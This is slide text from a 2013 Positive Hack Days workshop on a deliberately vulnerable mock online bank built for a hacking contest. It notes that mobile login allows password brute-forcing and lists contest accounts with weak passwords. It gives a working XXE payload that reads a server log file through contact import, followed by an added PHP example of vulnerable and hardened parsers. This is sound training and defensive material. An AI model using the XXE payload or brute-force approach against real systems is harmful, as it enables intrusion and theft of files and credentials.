$NATCH
Sergey Scherbel & Yuriy Dyachenko
Positive Technologies
Positive Hack Days 2013
Some Background
The competition took place for the first time at PHDays 2012.
$natch aims at demonstrating the typical vulnerabilities of online banking systems.
Positive Technologies performs security tests of online banking systems on a regular basis. We are really into it.
The most interesting and dangerous vulnerabilities, along with the simply typical weaknesses, are integrated into PHDays iBank.
Last Year Results
― 9 participants;
― 4 winners;
― the biggest winnings of 3,500 roubles;
― some winners got into the Positive community (after an extremely scary interview, of course).
PHDays iBank 2
PHDays iBank 2 is NOT a real online banking system used by actual banks.
The system was developed exclusively for the PHDays 2013 competition.
PHDays iBank 2 employs the typical vulnerabilities of online banking systems.
Competition Rules
― 100 bank clients;
― 10 participants;
― 20,000 roubles of prize money;
― 1 day for source code analysis;
― 30–40 minutes of the actual competition;
― a participant will get as much money as he/she will manage to transfer to his/her account;
― the participants can steal money from each other.
At Workshop
You will be able:
― to examine each vulnerability in detail;
― to exploit vulnerabilities “by hand”;
― to exploit vulnerabilities with various tools.
Everything is performed on a special copy of the competition system.
Authentication
One should enter the CAPTCHA to sign in.
Mobile Bank Authentication
No CAPTCHA here, thus brute-forcing account passwords is possible.
Accounts with Simple Passwords
100011:password
100012:phdays
100013:qwerty
100014:password
100015:123456
100016:12345
100017:11111
100018:ninja
100019:123123
100020:sex
100021:asdzxc
100022:654321
100023:iloveyou
100024:root
100025:master
100026:superman
...
Importing Contacts
Most online banks have a feature that allows one to import/export data.
XML External Entity
Loading of external entities is not disabled.
http://php.net/libxml_disable_entity_loader
XML External Entity
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE contact [
  <!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource=logs/changePassword.log">
]>
<contacts>
  <contact>
    <name>name</name>
    <account>90107430600712500003</account>
    <description>&x;</description>
  </contact>
</contacts>
http://www.php.net/manual/en/wrappers.php.php
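The contact-import parser behind this slide, as an added example that is not PHDays iBank 2 code: the vulnerable form (entity substitution on, loader left enabled) next to a hardened form that rejects the payload above. Function names and the <contacts><contact> layout are assumptions taken from the payload.

```php
<?php
// Added example, not PHDays iBank 2 code: the contact import in its vulnerable form and a
// hardened form. Function names and the <contacts><contact> layout are assumed from the payload.

// Constructed sample: the deck's XXE payload on one line.
$sample = '<?xml version="1.0" encoding="utf-8"?>'
    . '<!DOCTYPE contact [<!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource=logs/changePassword.log">]>'
    . '<contacts><contact><name>name</name><account>90107430600712500003</account>'
    . '<description>&x;</description></contact></contacts>';

function extractContacts(DOMDocument $doc): array
{
    $contacts = [];
    foreach ($doc->getElementsByTagName('contact') as $node) {
        $field = fn(string $tag) => $node->getElementsByTagName($tag)->item(0)->textContent ?? '';
        $contacts[] = ['name' => $field('name'), 'account' => $field('account'), 'description' => $field('description')];
    }
    return $contacts;
}

// Vulnerable: LIBXML_NOENT turns on entity substitution with the loader still enabled, so
// &x; expands to the base64 of logs/changePassword.log and is read back from "description".
function importContactsVulnerable(string $xml): array
{
    $doc = new DOMDocument();
    $doc->loadXML($xml, LIBXML_NOENT);
    return extractContacts($doc);
}

// Hardened: a contact export never needs a DTD, so refuse any DOCTYPE/ENTITY before
// libxml sees it; parse without LIBXML_NOENT or LIBXML_DTDLOAD and with LIBXML_NONET;
// on PHP < 8.0 also switch the entity loader off (8.0+ does so by default and
// deprecates libxml_disable_entity_loader()).
function importContactsHardened(string $xml): array
{
    if (preg_match('/<!(DOCTYPE|ENTITY)/i', $xml)) {
        throw new InvalidArgumentException('DTD declarations are not allowed in a contact import');
    }
    $previous = PHP_VERSION_ID < 80000 ? libxml_disable_entity_loader(true) : null;
    $doc = new DOMDocument();
    $ok = @$doc->loadXML($xml, LIBXML_NONET);
    if ($previous !== null) {
        libxml_disable_entity_loader($previous);
    }
    if (!$ok) {
        throw new InvalidArgumentException('malformed contact import');
    }
    return extractContacts($doc);
}
```

Feeding $sample to importContactsHardened() throws on the DOCTYPE check before libxml ever parses the entity declaration, so the log file is never opened.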